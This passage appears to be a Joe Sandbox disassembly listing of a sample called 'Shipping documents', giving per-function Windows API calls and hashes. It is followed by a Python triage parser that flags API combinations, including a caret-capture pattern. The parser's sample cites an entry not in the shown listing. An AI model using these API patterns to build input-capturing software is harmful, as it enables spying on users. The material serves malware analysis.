                                                                                                          • Instruction ID: 583e1dd4926d5dc430cd1974fab242c37593855fc3f83b6d902887b8cb8118b3
                                                                                                          • Opcode Fuzzy Hash: 12b73319f7521ef091ea4856e2d9fc07411b991347f193140c1b9c5819a8a9d6
                                                                                                          • Instruction Fuzzy Hash: 44F06D61510655E2CB34A791AD917FF72546F44341F00947BD90ED2190F368CB85CF99
                                                                                                          APIs
                                                                                                          • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312DE
                                                                                                          • GetProcAddress.KERNEL32(00000000,IcmpCloseHandle), ref: 004312F0
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AddressLibraryLoadProc
                                                                                                          • String ID: ICMP.DLL$IcmpCloseHandle
                                                                                                          • API String ID: 2574300362-3530519716
                                                                                                          • Opcode ID: 21a2acdac0ba1e2d746e72dbff1012e7ad80fb0484e1fffebf05da08cb8a0c44
                                                                                                          • Instruction ID: fe30dd6f995ef3e52e92cf139519288d45b371df6a06e7fbbc01cfddaae6e452
                                                                                                          • Opcode Fuzzy Hash: 21a2acdac0ba1e2d746e72dbff1012e7ad80fb0484e1fffebf05da08cb8a0c44
                                                                                                          • Instruction Fuzzy Hash: 89E01275500316DFDB105F66D80564B77DCDB14751F10482AFD45E2A51DBB8D48087E8
                                                                                                          APIs
                                                                                                          • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 00431310
                                                                                                          • GetProcAddress.KERNEL32(00000000,IcmpCreateFile), ref: 00431322
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AddressLibraryLoadProc
                                                                                                          • String ID: ICMP.DLL$IcmpCreateFile
                                                                                                          • API String ID: 2574300362-275556492
                                                                                                          • Opcode ID: c8e81b458e49d693ad0b98c25d1a2273645c6015ec642ff3830cff94addfde50
                                                                                                          • Instruction ID: 95e0d00128142f820e0a83de5ed484af687323a382b0c693d148963e73e99334
                                                                                                          • Opcode Fuzzy Hash: c8e81b458e49d693ad0b98c25d1a2273645c6015ec642ff3830cff94addfde50
                                                                                                          • Instruction Fuzzy Hash: E3E0C270400306EFD7107FA5D81464A77E8DB08310F104C2AFC40A2650C7B8D48087A8
                                                                                                          APIs
                                                                                                          • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312AC
                                                                                                          • GetProcAddress.KERNEL32(00000000,IcmpSendEcho), ref: 004312BE
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AddressLibraryLoadProc
                                                                                                          • String ID: ICMP.DLL$IcmpSendEcho
                                                                                                          • API String ID: 2574300362-58917771
                                                                                                          • Opcode ID: 8463976e88658be12d547e53f001863c36b7eb8c5d8a0eb88088b9b0d7e59d79
                                                                                                          • Instruction ID: f6e067919a3be2c94262fb81e38fb1c28335358536499f04279aa6303c0198c7
                                                                                                          • Opcode Fuzzy Hash: 8463976e88658be12d547e53f001863c36b7eb8c5d8a0eb88088b9b0d7e59d79
                                                                                                          • Instruction Fuzzy Hash: ADE0C2B0400706DFC7105F65D80465B77D8DB04321F10482BFD80E2610C7B8E48087A8
                                                                                                          APIs
                                                                                                          • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00430C91
                                                                                                          • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00430CA3
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AddressLibraryLoadProc
                                                                                                          • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                          • API String ID: 2574300362-4033151799
                                                                                                          • Opcode ID: d4a2309a593705586ca0189df29ebf11fe16cb5b9b4952fb03c76dd6ffec2ddb
                                                                                                          • Instruction ID: e1e112c22781e886f83f7ab60c8bc672304d94c0271b2a691c2b6ddb7eb549cd
                                                                                                          • Opcode Fuzzy Hash: d4a2309a593705586ca0189df29ebf11fe16cb5b9b4952fb03c76dd6ffec2ddb
                                                                                                          • Instruction Fuzzy Hash: 3FE0C2B0440315AFCB106F6AD95460B7BD89B14321F10583BF980E2600C7B8E88087B8
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 6f77df26dc74fc40ac7bf47809af4b9178697b073442c11c01de5ef3306f6c16
                                                                                                          • Instruction ID: c5df29d3d24fc858ebdc5227190e2e918b6fbc7f8fe9fd347d916346834f6d96
                                                                                                          • Opcode Fuzzy Hash: 6f77df26dc74fc40ac7bf47809af4b9178697b073442c11c01de5ef3306f6c16
                                                                                                          • Instruction Fuzzy Hash: 66E17F75600209AFCB04DF98C880EAEB7B9FF88714F10859AE909DB351D775EE45CBA0
                                                                                                          APIs
                                                                                                          • VariantInit.OLEAUT32(?), ref: 0047950F
                                                                                                          • SysAllocString.OLEAUT32(00000000), ref: 004795D8
                                                                                                          • VariantCopy.OLEAUT32(?,?), ref: 0047960F
                                                                                                          • VariantClear.OLEAUT32(?), ref: 00479650
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Variant$AllocClearCopyInitString
                                                                                                          • String ID:
                                                                                                          • API String ID: 2808897238-0
                                                                                                          • Opcode ID: d4078b498bd58c38c4ff211c6799319bb2158b2b01decc8b4cd966ad5c1122ff
                                                                                                          • Instruction ID: 372c40b5ecffa4d340e825e49f449287305c7189bb1404562c27c74c4f1437f4
                                                                                                          • Opcode Fuzzy Hash: d4078b498bd58c38c4ff211c6799319bb2158b2b01decc8b4cd966ad5c1122ff
                                                                                                          • Instruction Fuzzy Hash: 8251C436600209A6C700FF3AD8815DAB764EF84315F50863FFD0897252DB78DA1997EA
                                                                                                          APIs
                                                                                                          • SendMessageW.USER32(00000000,0000110A,00000004,?), ref: 00469990
                                                                                                          • __itow.LIBCMT ref: 004699CD
                                                                                                            • Part of subcall function 00461C4A: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00461CC2
                                                                                                          • SendMessageW.USER32(00000000,0000110A,00000001,?), ref: 00469A3D
                                                                                                          • __itow.LIBCMT ref: 00469A97
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$__itow
                                                                                                          • String ID:
                                                                                                          • API String ID: 3379773720-0
                                                                                                          • Opcode ID: f450223117ea95bfee34014d9d84978b58918b7dbb146b9b64e9adf8c20a5af9
                                                                                                          • Instruction ID: c5a9f548720e127460bbd30f9c4a1142764b372a0404ca0a71d180b9b8c9b2b0
                                                                                                          • Opcode Fuzzy Hash: f450223117ea95bfee34014d9d84978b58918b7dbb146b9b64e9adf8c20a5af9
                                                                                                          • Instruction Fuzzy Hash: E8415671A002096BDB14EF95D981AEF77BC9F58314F00405EFA0567281E7789E46CBE9
APIs
• GetWindowRect.USER32(?,?), ref: 00449A4A
• ScreenToClient.USER32(?,?), ref: 00449A80
• MoveWindow.USER32(?,?,?,?,?,00000001), ref: 00449AEC
Memory Dump Source
• Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
Similarity
• API ID: Window$ClientMoveRectScreen
• String ID:
• API String ID: 3880355969-0
• Opcode ID: d0f348dd6b8999688d199205b3412f9258e7834e979bdc0e5f61431c3cd0f715
• Instruction ID: 772f2e9a8c44c8b90650fefa000f178a1b73e5e444e4323f54854131c67d2362
• Opcode Fuzzy Hash: d0f348dd6b8999688d199205b3412f9258e7834e979bdc0e5f61431c3cd0f715
• Instruction Fuzzy Hash: 5A517C70A00249AFEB14CF68D8C1AAB77B6FF58314F10822EF91597390D774AD90DB98
APIs
Memory Dump Source
• Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
Similarity
• API ID: __flsbuf__flush__getptd_noexit__write_memmove
• String ID:
• API String ID: 2782032738-0
• Opcode ID: b31e9d6d4fc57bcba7966bec51b765adca5e1eea9d7940e8138ef5a4af09ff03
• Instruction ID: 72632960f292c6e9309c64fc9b7016af72cb639159fa0dd3c9cf05ee08d0b78d
• Opcode Fuzzy Hash: b31e9d6d4fc57bcba7966bec51b765adca5e1eea9d7940e8138ef5a4af09ff03
• Instruction Fuzzy Hash: CB41D531A00715ABDB248FA5C8486DFBBB5AFD0364F24856EF42597680D778DDC1CB48
APIs
• ClientToScreen.USER32(00000000,?), ref: 0044169A
• GetWindowRect.USER32(?,?), ref: 00441722
• PtInRect.USER32(?,?,?), ref: 00441734
• MessageBeep.USER32(00000000), ref: 004417AD
Memory Dump Source
• Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
Similarity
• API ID: Rect$BeepClientMessageScreenWindow
• String ID:
• API String ID: 1352109105-0
• Opcode ID: efc75fb8ed246b6ad65f2e8b456486d9870e0f063911f7aa846460c85c9d1d50
• Instruction ID: 3e4d0a9d31bb6386801ef6381a7f0d6bf168684d8964ff5a195b0ca439f55e04
• Opcode Fuzzy Hash: efc75fb8ed246b6ad65f2e8b456486d9870e0f063911f7aa846460c85c9d1d50
• Instruction Fuzzy Hash: 5141A539A002049FE714DF54D884E6AB7B5FF95721F1482AED9158B360DB34AC81CB94
APIs
• CreateHardLinkW.KERNEL32(00000000,?,00000000,?,00000000), ref: 0045D248
• GetLastError.KERNEL32(?,00000000), ref: 0045D26C
• DeleteFileW.KERNEL32(00000000,?,?,00000000), ref: 0045D28C
• CreateHardLinkW.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 0045D2AA
Memory Dump Source
• Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
Similarity
• API ID: CreateHardLink$DeleteErrorFileLast
• String ID:
• API String ID: 3321077145-0
• Opcode ID: 49223ed515fb619a5bee3fab41eec0f0b951464039ac7af7222e30fa4423140a
• Instruction ID: 6818256dd78c2cb29ac0ce267de24fb792dca3a41353b59757f5ace631f71379
• Opcode Fuzzy Hash: 49223ed515fb619a5bee3fab41eec0f0b951464039ac7af7222e30fa4423140a
• Instruction Fuzzy Hash: DC318DB1A00201EBDB10EFB5C945A1ABBE8AF45319F10885EFC44AB343CB79ED45CB94
APIs
• _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00420873
• __isleadbyte_l.LIBCMT ref: 004208A6
• MultiByteToWideChar.KERNEL32(BBDAE900,00000009,?,000001AC,00000000,00000000,?,?,?,0042D7C1,?,00000000), ref: 004208D7
• MultiByteToWideChar.KERNEL32(BBDAE900,00000009,?,00000001,00000000,00000000,?,?,?,0042D7C1,?,00000000), ref: 00420945
Memory Dump Source
• Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
Similarity
• API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
• String ID:
• API String ID: 3058430110-0
• Opcode ID: 6122c04dd5dc57efc0e5b6c0779ec963bae9ccf891294cd495d8fd5d7cdcec1f
• Instruction ID: f6550d230e50e909e13d2a99824cc28569674f7a7b9e5ef0daa2e7ce22e82e6e
• Opcode Fuzzy Hash: 6122c04dd5dc57efc0e5b6c0779ec963bae9ccf891294cd495d8fd5d7cdcec1f
• Instruction Fuzzy Hash: D731E231B00265EFDB20EF65E884AAF3BE5BF00310F55496AE4658B292D734CD80DB98
APIs
• GetParent.USER32(?), ref: 004503C8
• DefDlgProcW.USER32(?,00000138,?,?), ref: 00450417
• DefDlgProcW.USER32(?,00000133,?,?), ref: 00450466
• DefDlgProcW.USER32(?,00000134,?,?), ref: 00450497
Memory Dump Source
• Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
Similarity
• API ID: Proc$Parent
• String ID:
• API String ID: 2351499541-0
• Opcode ID: 953005dfd523491bc8661b2d189c1fe3a1d27544861a9947cd3b684206b02ae0
• Instruction ID: 48835c6935d03606f494e5d0f95072c3389227be5880c4b08380f2331de9f088
• Opcode Fuzzy Hash: 953005dfd523491bc8661b2d189c1fe3a1d27544861a9947cd3b684206b02ae0
• Instruction Fuzzy Hash: F231B73A2001046BD720CF18DC94DAB7719EF97335B14461BFA298B3D3CB759856C769
APIs
• PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00442AC9
• TranslateMessage.USER32(?), ref: 00442B01
• DispatchMessageW.USER32(?), ref: 00442B0B
• PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00442B21
Memory Dump Source
• Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
Similarity
• API ID: Message$Peek$DispatchTranslate
• String ID:
• API String ID: 1795658109-0
• Opcode ID: 36eab9d42bd73f6f728abf92f57c3db94032fb3fd80da71d70c6aa8f6f72699a
• Instruction ID: 5e5183f3b0572ad37d893cec5a7cf9421d6c1ddc4b80b1975d6d8daaa3c1acd1
• Opcode Fuzzy Hash: 36eab9d42bd73f6f728abf92f57c3db94032fb3fd80da71d70c6aa8f6f72699a
• Instruction Fuzzy Hash: 012126719583469AFB30DF649D85FB7BBA8CB24314F40407BF91097281EAB86848C769
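The function entries above list each function's imported calls as "Name.MODULE(args), ref: call-site" lines, with calls reached through a subcall indented beneath the caller. What follows is an added example, not Joe Sandbox code or output: a Python parser for that layout that groups the calls per function and flags a few combinations, run over a sample constructed from the CreateHardLinkW, PeekMessageW and GetForegroundWindow entries on this page plus one entry with no calls. The pattern table is my own illustrative heuristic, not a report signature: AttachThreadInput shares the calling thread's input state with the foreground window's thread, so the following GetCaretPos returns that window's caret rather than the caller's; CreateHardLinkW followed by GetLastError, DeleteFileW and a second CreateHardLinkW reads as a link-replace with one retry; the PeekMessageW/TranslateMessage/DispatchMessageW trio is an ordinary message loop and is listed only so a benign match is visible too.

```python
"""Parse the per-function "APIs" blocks of a Joe Sandbox disassembly listing
and flag API combinations worth a second look.  Added example, not Joe Sandbox
code; the PATTERNS table is my own illustrative heuristic."""
import re

# One call line: optional "Part of subcall function XXXX:" prefix, then
# Name.MODULE, optional "(args)", then "ref: ADDR".
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>[A-Za-z_][\w:]*)\.(?P<module>[A-Za-z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# Illustrative heuristics (mine, not report signatures).  A pattern fires when
# every API in its set is called by one function, including via its subcalls.
PATTERNS = [
    ("caret-pos-via-attached-input",
     {"GetForegroundWindow", "AttachThreadInput", "GetCaretPos"}),
    ("hardlink-replace-with-retry",
     {"CreateHardLinkW", "GetLastError", "DeleteFileW"}),
    ("message-pump",
     {"PeekMessageW", "TranslateMessage", "DispatchMessageW"}),
]

# Constructed sample in the report's own layout: an entry with no API calls,
# then the CreateHardLinkW, PeekMessageW and GetForegroundWindow entries.
SAMPLE_REPORT = """\
APIs
Memory Dump Source
APIs
• CreateHardLinkW.KERNEL32(00000000,?,00000000,?,00000000), ref: 0045D248
• GetLastError.KERNEL32(?,00000000), ref: 0045D26C
• DeleteFileW.KERNEL32(00000000,?,?,00000000), ref: 0045D28C
• CreateHardLinkW.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 0045D2AA
Memory Dump Source
Similarity
• API ID: CreateHardLink$DeleteErrorFileLast
APIs
• PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00442AC9
• TranslateMessage.USER32(?), ref: 00442B01
• DispatchMessageW.USER32(?), ref: 00442B0B
• PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00442B21
Memory Dump Source
APIs
• GetForegroundWindow.USER32 ref: 0047439C
  • Part of subcall function 004439C1: GetWindowThreadProcessId.USER32(?,00000000), ref: 004439E4
  • Part of subcall function 004439C1: GetCurrentThreadId.KERNEL32 ref: 004439EB
  • Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2
• GetCaretPos.USER32(?), ref: 004743B2
• ClientToScreen.USER32(00000000,?), ref: 004743E8
• GetForegroundWindow.USER32 ref: 004743EE
Memory Dump Source
"""


def parse_api_records(text):
    """One record per "APIs" block: first call-site ref, direct and subcall
    names in listing order, and the set of every API name seen."""
    records, current = [], None
    for line in text.splitlines():
        if line.strip() == "APIs":
            current = {"ref": None, "direct": [], "subcall": [], "apis": set()}
            records.append(current)
            continue
        m = API_LINE.match(line) if current is not None else None
        if m is None:
            current = None  # any non-call line ends the block
            continue
        name = m.group("name")
        current["apis"].add(name)
        if m.group("sub"):
            current["subcall"].append(name)
        else:
            current["direct"].append(name)
            if current["ref"] is None:
                current["ref"] = m.group("ref")  # first call site labels the function
    return records


def match_patterns(record):
    """Names of the heuristics whose full API set occurs in the record."""
    return [name for name, apis in PATTERNS if apis <= record["apis"]]


def triage(text):
    """(first call-site ref, matched pattern names) for every block that fires."""
    hits = []
    for rec in parse_api_records(text):
        matched = match_patterns(rec)
        if matched:
            hits.append((rec["ref"], matched))
    return hits


if __name__ == "__main__":
    for ref, matched in triage(SAMPLE_REPORT):
        print(ref, ", ".join(matched))
```

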